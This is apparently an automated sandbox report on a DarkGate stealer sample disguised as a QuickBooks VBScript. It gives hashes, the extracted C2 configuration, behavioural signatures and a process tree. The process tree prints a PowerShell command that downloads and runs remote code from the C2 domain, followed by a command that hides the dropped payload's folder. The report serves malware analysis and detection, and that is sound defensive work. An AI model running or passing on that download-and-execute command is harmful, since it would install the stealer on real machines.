Analysis
-
max time kernel
92s -
max time network
96s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
02-04-2024 16:08
Static task
static1
Behavioral task
behavioral1
Sample
quickbook_April-2024.vbs
Resource
win7-20240221-en
General
-
Target
quickbook_April-2024.vbs
-
Size
7KB
-
MD5
4ff404ceede30c0ca73b97e26f20dfa8
-
SHA1
5b2644004b27a4b39502ad0d4a0193d0124588cb
-
SHA256
885eae8e4d2788a7c54f4123cbf84b4e897082f8388a7b3f3c2bace9f9419e13
-
SHA512
4f8fbfb0dea83b81fcaff17cd4fea7cf888a99b186908f58b4b2d599b4a4f3df9bd9a8fadec7b25de5dea4dfaf416dca09ce6ce76a542ad32f0a96febe836ae1
-
SSDEEP
192:YMg119gkCtL3IqSPN3QzGNzUoNJnN/Y999E6:jy19gR3IquNgzG2oNla
Malware Config
Extracted
darkgate
admin888
31yc.com
-
anti_analysis
true
-
anti_debug
false
-
anti_vm
true
-
c2_port
80
-
check_disk
false
-
check_ram
false
-
check_xeon
false
-
crypter_au3
false
-
crypter_dll
false
-
crypter_raw_stub
false
-
internal_mutex
gWZTZaEo
-
minimum_disk
100
-
minimum_ram
4096
-
ping_interval
6
-
rootkit
false
-
startup_persistence
true
-
username
admin888
Signatures
-
Detect DarkGate stealer 2 IoCs
resource yara_rule behavioral2/memory/4980-41-0x0000000002E00000-0x0000000002E73000-memory.dmp family_darkgate_v6 behavioral2/memory/4980-44-0x0000000002E00000-0x0000000002E73000-memory.dmp family_darkgate_v6 -
Blocklisted process makes network request 4 IoCs
flow pid Process 11 5008 powershell.exe 17 5008 powershell.exe 23 5008 powershell.exe 24 5008 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 4980 KeyScramblerLogon.exe -
Loads dropped DLL 2 IoCs
pid Process 4980 KeyScramblerLogon.exe 4980 KeyScramblerLogon.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 KeyScramblerLogon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString KeyScramblerLogon.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 5008 powershell.exe 5008 powershell.exe 4980 KeyScramblerLogon.exe 4980 KeyScramblerLogon.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5008 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3728 wrote to memory of 5008 3728 WScript.exe 85 PID 3728 wrote to memory of 5008 3728 WScript.exe 85 PID 5008 wrote to memory of 4980 5008 powershell.exe 98 PID 5008 wrote to memory of 4980 5008 powershell.exe 98 PID 5008 wrote to memory of 4980 5008 powershell.exe 98 PID 5008 wrote to memory of 2072 5008 powershell.exe 99 PID 5008 wrote to memory of 2072 5008 powershell.exe 99 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2072 attrib.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\quickbook_April-2024.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '31yc.com/gcwkaqrq')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\ggrs\KeyScramblerLogon.exe"C:\ggrs\KeyScramblerLogon.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4980
-
-
C:\Windows\system32\attrib.exe"C:\Windows\system32\attrib.exe" +h C:/ggrs/3⤵
- Views/modifies file attributes
PID:2072
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.1MB
MD585e8143ef1b400569ec5479b72a405fc
SHA12326402a4972b1e6ec6dafd8db037f25ce908844
SHA25609b00a21a6fbe6922967113531f102f406a2ccb1693c2b0587b9cdd8639ef312
SHA512d0bf352275ff086260f3feedd910b664177538c08a9b986b938d44f2105aac82f56de82670a3d6935e513d77e1dbd823b771f8a62a0eeb7b43d455d73a1d476a
-
Filesize
500KB
MD5c790ebfcb6a34953a371e32c9174fe46
SHA13ead08d8bbdb3afd851877cb50507b77ae18a4d8
SHA256fa7ad2f45128120bccc33f996f87a81faa2e9c1236666dd69b943a755f332eb1
SHA51274e3ab12b2a2d5c45c5248dd2225bfbcf237a01ef94fdca3fe99cfde11bd7d0ccd25dd7f26bd283997d951f4df7e8f4b35f9475a32bdb854d6cc8867b2c45554
-
Filesize
457KB
MD5a96c1c7d3b42de72af043728028a6536
SHA1d646d9d9d0d53763ba0bb78f836a1c8733d89114
SHA25602e931975c0288baf5c6aa3a5f3ac2462cb46e8c694f03fc49a64408d047a94a
SHA5122f084d924ffd7e76abe5e371b3bfc80cb53304deb8b068a370bf4d77afd8a9074058c438149c822e0c99a76d526b84d56f25a9ce5074241863b13216df45f9df